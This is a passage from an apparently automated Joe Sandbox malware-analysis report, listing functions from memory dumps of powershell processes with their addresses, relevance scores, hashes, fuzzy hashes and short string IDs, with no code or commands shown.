                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (Qh$(Qh
                                                    • API String ID: 0-834373534
                                                    • Opcode ID: 581afc6350bd8db72c27c9c611f5c6ccc085569d9233209ae76a3c426a6a3267
                                                    • Instruction ID: dde150de97d8604fddfc134488b83de17590b86370936f7e7565dff1a2d515b5
                                                    • Opcode Fuzzy Hash: 581afc6350bd8db72c27c9c611f5c6ccc085569d9233209ae76a3c426a6a3267
                                                    • Instruction Fuzzy Hash: C5F1A130A1A91A8FDB98EB68C464A7977F2FF55311B108239E45ED32F2CE74AC45C780
                                                    Function 00007FFAAB7804A8 Relevance: 11.6, Strings: 9, Instructions: 330COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6g$6g$"rg$"rg$r6g$r6g$r6g$r6g$r6g
                                                    • API String ID: 0-171950219
                                                    • Opcode ID: 26ea0f78072d23b2e5ef95dae49114e5ae11b5ddd63e55d17310b0ac3165d923
                                                    • Instruction ID: 089023477c7a5d730e6f243d28f1948a876ca955f196047ea4fe7ae041687015
                                                    • Opcode Fuzzy Hash: 26ea0f78072d23b2e5ef95dae49114e5ae11b5ddd63e55d17310b0ac3165d923
                                                    • Instruction Fuzzy Hash: 97A13961B19A458FE798EF7C88597B8B7E2FF9D350F048179D04DC36A2CE68984583C1
                                                    Function 00007FFAAB7815BD Relevance: 6.7, Strings: 5, Instructions: 474COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6g$"rg$r6g$r6g$r6g
                                                    • API String ID: 0-571899652
                                                    • Opcode ID: 6c2758d7a372874010b094b88c20b0fb3e1a327ecb4b68e5bc5bec9fa60c2da9
                                                    • Instruction ID: d9049d5b9e45a5302eda2545fd82fd27e99b56755134b3738b198c797b115bd1
                                                    • Opcode Fuzzy Hash: 6c2758d7a372874010b094b88c20b0fb3e1a327ecb4b68e5bc5bec9fa60c2da9
                                                    • Instruction Fuzzy Hash: F5613961A0E7818FE3599BB84859679BFE1FF6A250F0881BED08CC36F3DD64584993C1
                                                    Function 00007FFAAB7812B9 Relevance: 2.6, Strings: 2, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8[q$r6g
                                                    • API String ID: 0-2420977302
                                                    • Opcode ID: 49527299e78eb10e935e68ab6395e1208f963501b3de89b92c4e14af1d368939
                                                    • Instruction ID: a8fb98a5f8e5c94436b296d90806b1c12fd74868f7ce02513a401118282ed714
                                                    • Opcode Fuzzy Hash: 49527299e78eb10e935e68ab6395e1208f963501b3de89b92c4e14af1d368939
                                                    • Instruction Fuzzy Hash: B0114C62F4E8491FF364A7BC68565F577E5CB9A260B054176E04CC3AE3DC1C588783D0
                                                    Function 00007FFAAB7804B0 Relevance: 2.6, Strings: 2, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8[q$r6g
                                                    • API String ID: 0-2420977302
                                                    • Opcode ID: e00ef33eee8d2972d5a0295a506651c667e5dc8627bbcdad8ea0e6125e8c57cf
                                                    • Instruction ID: 0b0c069e7aa88e07eda0cc5465464f280af0e19482db1b7c2a51d675844c566e
                                                    • Opcode Fuzzy Hash: e00ef33eee8d2972d5a0295a506651c667e5dc8627bbcdad8ea0e6125e8c57cf
                                                    • Instruction Fuzzy Hash: 06F02852F1AC0A0BF3B8BABD649A7F567D6DBDD260F004079E04DC27A6DC589C8283C0
                                                    Function 00007FFAAB78065D Relevance: 1.5, Strings: 1, Instructions: 298COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^
                                                    • API String ID: 0-897003143
                                                    • Opcode ID: 935ea0628342b4cb9b24911ab31be5a05e76b07585dca768b581fd28291b7f8b
                                                    • Instruction ID: 5bc0e0ceaebf33660f7d5b67a94564fccf89db76fd6f8c6e828c70f522e09942
                                                    • Opcode Fuzzy Hash: 935ea0628342b4cb9b24911ab31be5a05e76b07585dca768b581fd28291b7f8b
                                                    • Instruction Fuzzy Hash: 6F21E362E0F3819FE3166778D4691F83B70DF83264F0984B7C18D8A4B3DD1D248A8392
                                                    Function 00007FFAAB7809C5 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8eq
                                                    • API String ID: 0-356513418
                                                    • Opcode ID: 7d752cdc0c4eaeeaa01e6c6d2bd80f9154afeeaf78d4c3f7de29cc883e0a8975
                                                    • Instruction ID: ee07e514863f299e1858266a3e24b781c1724326cd4ba4a12a51ef0279966a5b
                                                    • Opcode Fuzzy Hash: 7d752cdc0c4eaeeaa01e6c6d2bd80f9154afeeaf78d4c3f7de29cc883e0a8975
                                                    • Instruction Fuzzy Hash: 80F0BB21919B514FD794AB2C88954797BE0DF95250B05457AE848C62A2D92CD58583C1
                                                    Function 00007FFAAB781B2E Relevance: .1, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aee0eb8644101eaa4f0b6d4a2054f59f1878a2cc174f41cbeb16853103f740b8
                                                    • Instruction ID: 2f984549b36615e996a317f548dfa0c106a9c8cc83fb47dbc6497e0ed630779c
                                                    • Opcode Fuzzy Hash: aee0eb8644101eaa4f0b6d4a2054f59f1878a2cc174f41cbeb16853103f740b8
                                                    • Instruction Fuzzy Hash: 9831157190A7CA8FD745D7A8C8651FD7FF1EF86250F4580BAC009E75B3CD58184A8391
                                                    Function 00007FFAAB7811C9 Relevance: .1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: adf734f7ecf92b451d445873c62dcdcfa98c1261518bc44f70e4ebaa067339e2
                                                    • Instruction ID: 756c7158dfc490d6019888d0e047de6c7df0e697a86cbd8e4aaf6f2a8f173306
                                                    • Opcode Fuzzy Hash: adf734f7ecf92b451d445873c62dcdcfa98c1261518bc44f70e4ebaa067339e2
                                                    • Instruction Fuzzy Hash: B8210831A1895D4FD755EB38C865AB9B3E1FF89340F0480B6D00EC36A2DE38E84587C0
                                                    Function 00007FFAAB781C79 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d96e0273c24c98ef84e74003c5d0617b0ab76c762c359018b1aaf0c2a4181b16
                                                    • Instruction ID: 90e62183551a4d3ebf947c2b0ac697914e04583ea0e46a71224c8332177cb9dc
                                                    • Opcode Fuzzy Hash: d96e0273c24c98ef84e74003c5d0617b0ab76c762c359018b1aaf0c2a4181b16
                                                    • Instruction Fuzzy Hash: B021DA31B0A65C8FE765AB7884656B937A1EF4A311F4041BBD40EC72E3CD399C458781
                                                    Function 00007FFAAB7804C0 Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ceea4336b34e62b2c30103fd7850c8200b071d7c5cd611167c870c10498e0f55
                                                    • Instruction ID: a00b5a81070350f6623894a6a115469052e19bd9c6bf3f358905f1dd1fc209c6
                                                    • Opcode Fuzzy Hash: ceea4336b34e62b2c30103fd7850c8200b071d7c5cd611167c870c10498e0f55
                                                    • Instruction Fuzzy Hash: 2211C875A28C5E4BD7A8FB78C451AB9B3E5FF99340F0084B5D00EC3692DE38A84547C0
                                                    Function 00007FFAAB7804C8 Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8a2ece0c40e4e5f47d539d3e39ff3296921d0722d540a3223ee6f23e77784f76
                                                    • Instruction ID: b090f5c46134f0a3aeecbc0977d43db4247a8f27f999e85788d8704144aef356
                                                    • Opcode Fuzzy Hash: 8a2ece0c40e4e5f47d539d3e39ff3296921d0722d540a3223ee6f23e77784f76
                                                    • Instruction Fuzzy Hash: CA11A730B1591D8FE764BB7984557B933A1EB8D355F10417AE40EC37A2CD39984587C0

                                                    Non-executed Functions

                                                    Function 00007FFAAB7818CC Relevance: 5.2, Strings: 4, Instructions: 187COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6g$"rg$r6g$r6g
                                                    • API String ID: 0-3015325437
                                                    • Opcode ID: 1fbe9cdf8907894eff36173c2faac9042ac1bb8119fd9e6435bf153d0d4a4b46
                                                    • Instruction ID: 0d8f8defd71e94e53e703a96e31e397400aea7272c1fd557b0faa317742c6ba9
                                                    • Opcode Fuzzy Hash: 1fbe9cdf8907894eff36173c2faac9042ac1bb8119fd9e6435bf153d0d4a4b46
                                                    • Instruction Fuzzy Hash: E051F661B19A458FE798EF6C88557B8A7E2FF9D350F048179D04DC36A3DE68A88583C0

                                                    Executed Functions

                                                    Function 00007FFAAB79644D Relevance: 2.0, Strings: 1, Instructions: 718COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468313485.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6g
                                                    • API String ID: 0-1031791518
                                                    • Opcode ID: 485c77312a2b52ca7f6a7a63e124213d692950d36d3824e2d6cf652c74514e6b
                                                    • Instruction ID: 8a00bc474c3a5e1a2f81108427cf1a9e7fab56f8826864482ebed1bcae51aca7
                                                    • Opcode Fuzzy Hash: 485c77312a2b52ca7f6a7a63e124213d692950d36d3824e2d6cf652c74514e6b
                                                    • Instruction Fuzzy Hash: 1AD18B30A09A4D8FDB88DF58C454EA97BB1FF69340F14826AD40DD72A6CA75E845CBC1
                                                    Function 00007FFAAB866605 Relevance: .4, Instructions: 447COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468931609.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 09b9709c8b2e406ee73bfd73287d34a42b3e4eeed2705aa7dcdd6bac003c98e0
                                                    • Instruction ID: f762dccbef8a1eaa1d75d17b77b74439711ed4a42708bb38de2fe21a15b73daf
                                                    • Opcode Fuzzy Hash: 09b9709c8b2e406ee73bfd73287d34a42b3e4eeed2705aa7dcdd6bac003c98e0
                                                    • Instruction Fuzzy Hash: F6D1366290EBCA9FE765976C98255F9BF91EF1B350F0841FED44DCB0A3D918A80983C1
                                                    Function 00007FFAAB7996FA Relevance: .2, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468313485.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d49846dc2f8dde0c591b2f9210b7cb925fbff4e12f11d7664fc7bcc1df3e413b
                                                    • Instruction ID: 98a2836b27216ef245a51ab221853d48f74f04000516e6fbcfda182cdb82a35d
                                                    • Opcode Fuzzy Hash: d49846dc2f8dde0c591b2f9210b7cb925fbff4e12f11d7664fc7bcc1df3e413b
                                                    • Instruction Fuzzy Hash: C2514B72A0DB889FE7599B1C9C165E97FF0FF56321F04427FD489831A2DE61680687C2
                                                    Function 00007FFAAB67E620 Relevance: .1, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1467693296.00007FFAAB67D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB67D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab67d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 981ba1d4a87a67ef895c287042e141efb54550759d169b289301f5f566b02a15
                                                    • Instruction ID: 72e02ac6a996038f6a5ebdb04e917f8692d6747063dfefcd9ee80b226c0334d0
                                                    • Opcode Fuzzy Hash: 981ba1d4a87a67ef895c287042e141efb54550759d169b289301f5f566b02a15
                                                    • Instruction Fuzzy Hash: 1141257140DBC48FE756CB2898459523FF0EF57360B1505EFE088CB1A3D625A84AC792
                                                    Function 00007FFAAB79A1F3 Relevance: .1, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468313485.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d2f514d7e1d3af8f771920ca88cea4c4d0882b699eed8c724123b3448ff3942
                                                    • Instruction ID: b8ccdfc8647aaae5eb3977507ffbba9958933c369b705fa9f2f98caf560b6b36
                                                    • Opcode Fuzzy Hash: 3d2f514d7e1d3af8f771920ca88cea4c4d0882b699eed8c724123b3448ff3942
                                                    • Instruction Fuzzy Hash: DD31C3B380A6DACFD7569B689C660E47FB0EE6211874843F7D08CCA0A3F91A550987D2
                                                    Function 00007FFAAB79A62C Relevance: .1, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468313485.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 92224a63126f1093c0c1ba9e2ab76bfbecf749df3b71d940f12f97fe4ebc1387
                                                    • Instruction ID: 2ca27009c3accb6132f3265c907fd9c77d50e6b586316a939d465b05911e79e2
                                                    • Opcode Fuzzy Hash: 92224a63126f1093c0c1ba9e2ab76bfbecf749df3b71d940f12f97fe4ebc1387
                                                    • Instruction Fuzzy Hash: 12212B3190DB4C8FDB58DB6C984A7E97FF0EB56331F04416BD049C3162DA74541ACB91
                                                    Function 00007FFAAB7933B5 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468313485.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction ID: b1e65471143f2844b230ed71ff2fda1b7ab4172bc61a6a0745b4548f68134739
                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction Fuzzy Hash: FA01677115CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                    Function 00007FFAAB86414D Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468931609.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a00354c8d85679b5e21c5dd1e7dac28ec7c0de40bab422982d77f63072c2177a
                                                    • Instruction ID: cbd550c6da8c6a45b38cb37aef437fcc03510f9732fa168bd3f246e16ad4f7fa
                                                    • Opcode Fuzzy Hash: a00354c8d85679b5e21c5dd1e7dac28ec7c0de40bab422982d77f63072c2177a
                                                    • Instruction Fuzzy Hash: 0FF0BE32A0D5488FD759EB5CE4428E8B3E0EF5A360B1540FAE05DC71B3DA25EC44C780
                                                    Function 00007FFAAB864400 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468931609.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e29d118b918ae68ff0e61d61777d74bc26b3c8480348f855631f5cd3f66260fa
                                                    • Instruction ID: c687871b80a238b3d345ecaf8309d65afc6bf49a9161007c39d453b6ba0a215c
                                                    • Opcode Fuzzy Hash: e29d118b918ae68ff0e61d61777d74bc26b3c8480348f855631f5cd3f66260fa
                                                    • Instruction Fuzzy Hash: 3BF0BE32A0E5448FD755EB1CE0528E8B7E0FF0A720B4540F6E04DC7063DA26AC44C780
                                                    Function 00007FFAAB8641D1 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468931609.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction ID: 0e292ba13caaa3d36185f6c91dbd74b335d1caea5cceec33205345a09a996438
                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction Fuzzy Hash: 28E0E531B0C808CF9A68DB0CE0519A9B3E1EB99361B1541A6D14EC7561DA22FC558B80

                                                    Non-executed Functions

                                                    Function 00007FFAAB798995 Relevance: 5.1, Strings: 4, Instructions: 144COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468313485.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^$M_^$M_^$M_^
                                                    • API String ID: 0-2235110077
                                                    • Opcode ID: 126a91b963783532aff52bf9f73e1bb7397b26d31c3c714d9af4c4de5c474d0a
                                                    • Instruction ID: 5a56d4acc8fdf067b90a2b307ca87297ece38d3735f89cd0854b772d50838f04
                                                    • Opcode Fuzzy Hash: 126a91b963783532aff52bf9f73e1bb7397b26d31c3c714d9af4c4de5c474d0a
                                                    • Instruction Fuzzy Hash: BB41579290F7C2DFE39A47584C690957FB0EF6369474D43F7C0C98B4F3E95A180A8292
                                                    Function 00007FFAAB7989FA Relevance: 5.1, Strings: 4, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468313485.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^$M_^$M_^$M_^
                                                    • API String ID: 0-2235110077
                                                    • Opcode ID: dcca1bbf8518ab800c8cdb83c7c2b5d6457c4918aec0375b56c28f514f9c6759
                                                    • Instruction ID: 196be03e2b39f9782f42ea23528302c8715f99f2f80f7a3cf00926d94e1effdc
                                                    • Opcode Fuzzy Hash: dcca1bbf8518ab800c8cdb83c7c2b5d6457c4918aec0375b56c28f514f9c6759
                                                    • Instruction Fuzzy Hash: 7331439290FAC2DFF29A475948650A57FB0EF536A474D43F6C089874F3F99B180A41D2

                                                    Executed Functions

                                                    Function 00007FFAAB846605 Relevance: .4, Instructions: 447COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1700146156.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffaab840000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1adc334344d1ec31e5ce09808bb04d37e81571bc4465ddfcb01ee777707e97f
                                                    • Instruction ID: bd5868e75d1d325234eb27fdf6133cb31d14f537dd7eea8287b8a3e250f7497e
                                                    • Opcode Fuzzy Hash: c1adc334344d1ec31e5ce09808bb04d37e81571bc4465ddfcb01ee777707e97f
                                                    • Instruction Fuzzy Hash: 67D1366290EBCA9FE7659B7CC8155F9BF91EF1B250B0841FED44DCB0A3D918A809C391
                                                    Function 00007FFAAB77A808 Relevance: .2, Instructions: 220COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1697699943.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffaab770000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 79d85dc631725fd858d4a0bd5653ea0423276013a4d0bb1cb7f9d5d76ef7d282
                                                    • Instruction ID: e22c1b921452ca8992596a697587001281b3a71cc036a9cb54226ba7d3ec14fe
                                                    • Opcode Fuzzy Hash: 79d85dc631725fd858d4a0bd5653ea0423276013a4d0bb1cb7f9d5d76ef7d282
                                                    • Instruction Fuzzy Hash: C051377250EBC59FE70ACB2CC8955607BE0EF5725870841BED48ACB2B3ED15A847C782
                                                    Function 00007FFAAB779FF3 Relevance: .2, Instructions: 154COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1697699943.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffaab770000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6afb2768207d6187ef28f7f1965dcad4f2570cff681a04bef4623ddd2ccd1c77
                                                    • Instruction ID: 71db6a33cf31485394d08cdebb70a708bd4d6a59a724f73367d47061e2c3725b
                                                    • Opcode Fuzzy Hash: 6afb2768207d6187ef28f7f1965dcad4f2570cff681a04bef4623ddd2ccd1c77
                                                    • Instruction Fuzzy Hash: E541E69380FBC28FF31697A858A91E47FB0EF6319571844F7D5898A1B3E944588EC3D2
                                                    Function 00007FFAAB779758 Relevance: .1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1697699943.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffaab770000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7a32b6793521e8e1a448219db90a979d41d183376224c4306a22604295eb5aaf
                                                    • Instruction ID: bb264fe8cefab40875d5596229929a23cc40c373781945cef7d40a9e9c106f06
                                                    • Opcode Fuzzy Hash: 7a32b6793521e8e1a448219db90a979d41d183376224c4306a22604295eb5aaf
                                                    • Instruction Fuzzy Hash: 6931F97190DB489FEB189F4C98466F97BE0FB99311F00812FE04D93262CA60A8558BC2
                                                    Function 00007FFAAB65EB80 Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1695615440.00007FFAAB65D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB65D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffaab65d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 424d9f685ebe556778f6e8c6a4e5412e19ad12dc74d2fa4ef605da0235d87c00
                                                    • Instruction ID: 3880b655658f03db6ba28043e3a4623654fa631055e3790133431a3c3847577e
                                                    • Opcode Fuzzy Hash: 424d9f685ebe556778f6e8c6a4e5412e19ad12dc74d2fa4ef605da0235d87c00
                                                    • Instruction Fuzzy Hash: 7741287140EBC48FE756CB2898459623FF0EF57265F1506DFD08DCB1A3D629A80AC792
                                                    Function 00007FFAAB77A71C Relevance: .1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1697699943.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffaab770000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
